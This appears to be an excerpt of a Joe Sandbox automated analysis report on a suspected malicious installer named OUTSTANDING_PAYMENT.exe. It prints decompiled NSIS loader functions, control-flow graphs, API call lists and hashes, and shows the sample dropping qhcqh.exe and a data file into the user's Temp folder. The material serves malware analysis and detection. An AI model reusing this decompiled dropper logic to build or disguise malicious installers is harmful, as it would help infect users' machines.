						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                                                                                        0x00403d1d
                                                                                                                        0x00403d26
                                                                                                                        0x00403d2d
                                                                                                                        0x00403d2f
                                                                                                                        0x00403d43
                                                                                                                        0x00403d55
                                                                                                                        0x00403d5e
                                                                                                                        0x00403d67
                                                                                                                        0x00403d6e
                                                                                                                        0x00403d73
                                                                                                                        0x00403d7a
                                                                                                                        0x00403d8d
                                                                                                                        0x00403d8d
                                                                                                                        0x00403d98
                                                                                                                        0x00403d31
                                                                                                                        0x00403d3c
                                                                                                                        0x00403d3c
                                                                                                                        0x00403d9d
                                                                                                                        0x00403da7
                                                                                                                        0x00403db0
                                                                                                                        0x00403db5
                                                                                                                        0x00403dc6
                                                                                                                        0x00403e58
                                                                                                                        0x00403e60
                                                                                                                        0x00403e69
                                                                                                                        0x00403e69
                                                                                                                        0x00403e7f
                                                                                                                        0x00403e85
                                                                                                                        0x00403e93
                                                                                                                        0x00403f14
                                                                                                                        0x00403f1c
                                                                                                                        0x00403f26
                                                                                                                        0x00403f2b
                                                                                                                        0x00403f31
                                                                                                                        0x00403fbb
                                                                                                                        0x00403fc0
                                                                                                                        0x00403fc2
                                                                                                                        0x00403fde
                                                                                                                        0x00000000
                                                                                                                        0x00403fde
                                                                                                                        0x00403fc4
                                                                                                                        0x00403fca
                                                                                                                        0x00403fd2
                                                                                                                        0x00403fd2
                                                                                                                        0x00000000
                                                                                                                        0x00403fca
                                                                                                                        0x00403f3f
                                                                                                                        0x00403f4a
                                                                                                                        0x00403f4f
                                                                                                                        0x00403f51
                                                                                                                        0x00403f58
                                                                                                                        0x00403f58
                                                                                                                        0x00403f63
                                                                                                                        0x00403f6b
                                                                                                                        0x00403f6d
                                                                                                                        0x00403f6f
                                                                                                                        0x00403f78
                                                                                                                        0x00403f7b
                                                                                                                        0x00403f81
                                                                                                                        0x00403f81
                                                                                                                        0x00403fa0
                                                                                                                        0x00403fb1
                                                                                                                        0x00000000
                                                                                                                        0x00403fb6
                                                                                                                        0x00403f1e
                                                                                                                        0x00403f20
                                                                                                                        0x00000000
                                                                                                                        0x00403e95
                                                                                                                        0x00403e95
                                                                                                                        0x00403ea1
                                                                                                                        0x00403eab
                                                                                                                        0x00403eb1
                                                                                                                        0x00403eb6
                                                                                                                        0x00403ec5
                                                                                                                        0x00403fe3
                                                                                                                        0x00403fe3
                                                                                                                        0x00000000
                                                                                                                        0x00403fe3
                                                                                                                        0x00403ed4
                                                                                                                        0x00403f0f
                                                                                                                        0x00000000
                                                                                                                        0x00403f0f
                                                                                                                        0x00403dcc
                                                                                                                        0x00403dcc
                                                                                                                        0x00403dcf
                                                                                                                        0x00403dd1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403ddf
                                                                                                                        0x00403df1
                                                                                                                        0x00403df6
                                                                                                                        0x00403dff
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403e05
                                                                                                                        0x00403e07
                                                                                                                        0x00403e14
                                                                                                                        0x00403e14
                                                                                                                        0x00403e1d
                                                                                                                        0x00403e23
                                                                                                                        0x00403e4b
                                                                                                                        0x00403e53
                                                                                                                        0x00000000
                                                                                                                        0x00403e35
                                                                                                                        0x00403e36
                                                                                                                        0x00403e3f
                                                                                                                        0x00403e45
                                                                                                                        0x00403e46
                                                                                                                        0x00000000
                                                                                                                        0x00403e46
                                                                                                                        0x00403e41
                                                                                                                        0x00403e43
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403e43
                                                                                                                        0x00403e23

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                                          • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                                        • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                                                                        • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,?,?,?,"C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74D0FAA0), ref: 00403E18
                                                                                                                        • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,?,?,?,"C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                                                        • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,?,00000000,?), ref: 00403E36
                                                                                                                        • LoadImageW.USER32 ref: 00403E7F
                                                                                                                          • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                                                        • RegisterClassW.USER32 ref: 00403EBC
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                                                                                        • CreateWindowExW.USER32 ref: 00403F09
                                                                                                                        • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                                                        • GetClassInfoW.USER32 ref: 00403F6B
                                                                                                                        • GetClassInfoW.USER32 ref: 00403F78
                                                                                                                        • RegisterClassW.USER32 ref: 00403F81
                                                                                                                        • DialogBoxParamW.USER32 ref: 00403FA0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                        • API String ID: 1975747703-3098150667
                                                                                                                        • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                                                        • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                                                        • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                                                        • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\OUTSTANDING_PAYMENT.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\hardz\\Desktop\\OUTSTANDING_PAYMENT.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\hardz\\Desktop", L"C:\\Users\\hardz\\Desktop\\OUTSTANDING_PAYMENT.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                                                                                                                        0x004030db
                                                                                                                        0x004030de
                                                                                                                        0x004030e1
                                                                                                                        0x004030fb
                                                                                                                        0x00403100
                                                                                                                        0x00403113
                                                                                                                        0x00403118
                                                                                                                        0x0040311e
                                                                                                                        0x00000000
                                                                                                                        0x00403120
                                                                                                                        0x00403131
                                                                                                                        0x00403142
                                                                                                                        0x00403149
                                                                                                                        0x00403151
                                                                                                                        0x00403156
                                                                                                                        0x00403158
                                                                                                                        0x00403243
                                                                                                                        0x00403245
                                                                                                                        0x00403251
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040325a
                                                                                                                        0x00403286
                                                                                                                        0x0040328b
                                                                                                                        0x00403296
                                                                                                                        0x00403298
                                                                                                                        0x004032a9
                                                                                                                        0x004032c4
                                                                                                                        0x004032cd
                                                                                                                        0x004032d2
                                                                                                                        0x004032f1
                                                                                                                        0x00403301
                                                                                                                        0x00403313
                                                                                                                        0x00403318
                                                                                                                        0x00403320
                                                                                                                        0x0040332d
                                                                                                                        0x00403335
                                                                                                                        0x0040333a
                                                                                                                        0x0040333c
                                                                                                                        0x0040333c
                                                                                                                        0x00403344
                                                                                                                        0x00403344
                                                                                                                        0x00403347
                                                                                                                        0x00403348
                                                                                                                        0x00403348
                                                                                                                        0x0040334b
                                                                                                                        0x0040334d
                                                                                                                        0x0040334d
                                                                                                                        0x00403357
                                                                                                                        0x00403363
                                                                                                                        0x00000000
                                                                                                                        0x00403368
                                                                                                                        0x00000000
                                                                                                                        0x00403320
                                                                                                                        0x00000000
                                                                                                                        0x004032d4
                                                                                                                        0x00403262
                                                                                                                        0x00403274
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040315e
                                                                                                                        0x00403163
                                                                                                                        0x00403168
                                                                                                                        0x0040316c
                                                                                                                        0x00403173
                                                                                                                        0x0040317a
                                                                                                                        0x0040317c
                                                                                                                        0x0040317c
                                                                                                                        0x00403187
                                                                                                                        0x004032e0
                                                                                                                        0x00403322
                                                                                                                        0x00000000
                                                                                                                        0x00403322
                                                                                                                        0x00403194
                                                                                                                        0x00403214
                                                                                                                        0x00403218
                                                                                                                        0x0040321d
                                                                                                                        0x00000000
                                                                                                                        0x00403214
                                                                                                                        0x0040319d
                                                                                                                        0x004031a2
                                                                                                                        0x004031aa
                                                                                                                        0x004031d0
                                                                                                                        0x004031df
                                                                                                                        0x004031e5
                                                                                                                        0x004031ea
                                                                                                                        0x004031f0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004031fa
                                                                                                                        0x00403202
                                                                                                                        0x00403205
                                                                                                                        0x0040320a
                                                                                                                        0x0040320c
                                                                                                                        0x0040320c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004031fa
                                                                                                                        0x0040321e
                                                                                                                        0x00403224
                                                                                                                        0x00403230
                                                                                                                        0x00403230
                                                                                                                        0x00403233
                                                                                                                        0x00403239
                                                                                                                        0x00403239
                                                                                                                        0x00403241
                                                                                                                        0x00000000
                                                                                                                        0x00403241

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 004030E4
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe,00000400), ref: 00403100
                                                                                                                          • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe,80000000,00000003), ref: 0040615C
                                                                                                                          • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe,C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe,80000000,00000003), ref: 00403149
                                                                                                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                        • API String ID: 2803837635-1579130140
                                                                                                                        • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                                                        • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                                                        • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                                                        • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                                                                                                        C-Code - Quality: 77%
                                                                                                                        			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\hardz\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                                                                                                        0x0040176f
                                                                                                                        0x00401776
                                                                                                                        0x00401782
                                                                                                                        0x00401785
                                                                                                                        0x0040178a
                                                                                                                        0x0040178d
                                                                                                                        0x00401794
                                                                                                                        0x004017b0
                                                                                                                        0x00401796
                                                                                                                        0x00401797
                                                                                                                        0x00401797
                                                                                                                        0x004017b6
                                                                                                                        0x004017bb
                                                                                                                        0x004017bb
                                                                                                                        0x004017bf
                                                                                                                        0x004017c2
                                                                                                                        0x004017c7
                                                                                                                        0x004017c9
                                                                                                                        0x004017cb
                                                                                                                        0x004017d0
                                                                                                                        0x004017d0
                                                                                                                        0x004017db
                                                                                                                        0x004017db
                                                                                                                        0x004017ec
                                                                                                                        0x004017ee
                                                                                                                        0x004017ee
                                                                                                                        0x004017ef
                                                                                                                        0x004017ef
                                                                                                                        0x004017f2
                                                                                                                        0x004017f5
                                                                                                                        0x004017f8
                                                                                                                        0x004017f8
                                                                                                                        0x004017ff
                                                                                                                        0x0040180e
                                                                                                                        0x00401813
                                                                                                                        0x00401816
                                                                                                                        0x00401819
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040181b
                                                                                                                        0x0040181e
                                                                                                                        0x00401874
                                                                                                                        0x00401879
                                                                                                                        0x004015b6
                                                                                                                        0x0040292e
                                                                                                                        0x0040292e
                                                                                                                        0x00402c2a
                                                                                                                        0x00402c2d
                                                                                                                        0x00402c2d
                                                                                                                        0x00000000
                                                                                                                        0x00401820
                                                                                                                        0x00401826
                                                                                                                        0x0040182d
                                                                                                                        0x0040183a
                                                                                                                        0x00401845
                                                                                                                        0x0040185b
                                                                                                                        0x0040185b
                                                                                                                        0x0040185e
                                                                                                                        0x00000000
                                                                                                                        0x00401864
                                                                                                                        0x00401864
                                                                                                                        0x00401865
                                                                                                                        0x00401882
                                                                                                                        0x00402c33
                                                                                                                        0x00402c33
                                                                                                                        0x00402c33
                                                                                                                        0x00401867
                                                                                                                        0x00401867
                                                                                                                        0x00401868
                                                                                                                        0x00401493
                                                                                                                        0x0040239d
                                                                                                                        0x0040239d
                                                                                                                        0x0040239d
                                                                                                                        0x00401865
                                                                                                                        0x0040185e
                                                                                                                        0x00402c35
                                                                                                                        0x00402c39
                                                                                                                        0x00402c39
                                                                                                                        0x00401892
                                                                                                                        0x00401897
                                                                                                                        0x004018a5
                                                                                                                        0x004018aa
                                                                                                                        0x004018b0
                                                                                                                        0x004018b4
                                                                                                                        0x004018b6
                                                                                                                        0x004018be
                                                                                                                        0x004018ca
                                                                                                                        0x004018b8
                                                                                                                        0x004018b8
                                                                                                                        0x004018bc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004018bc
                                                                                                                        0x004018d3
                                                                                                                        0x004018d9
                                                                                                                        0x004018db
                                                                                                                        0x00000000
                                                                                                                        0x004018e1
                                                                                                                        0x004018e1
                                                                                                                        0x004018e4
                                                                                                                        0x004018fc
                                                                                                                        0x004018e6
                                                                                                                        0x004018e9
                                                                                                                        0x004018f2
                                                                                                                        0x004018f2
                                                                                                                        0x00401901
                                                                                                                        0x00401906
                                                                                                                        0x00402398
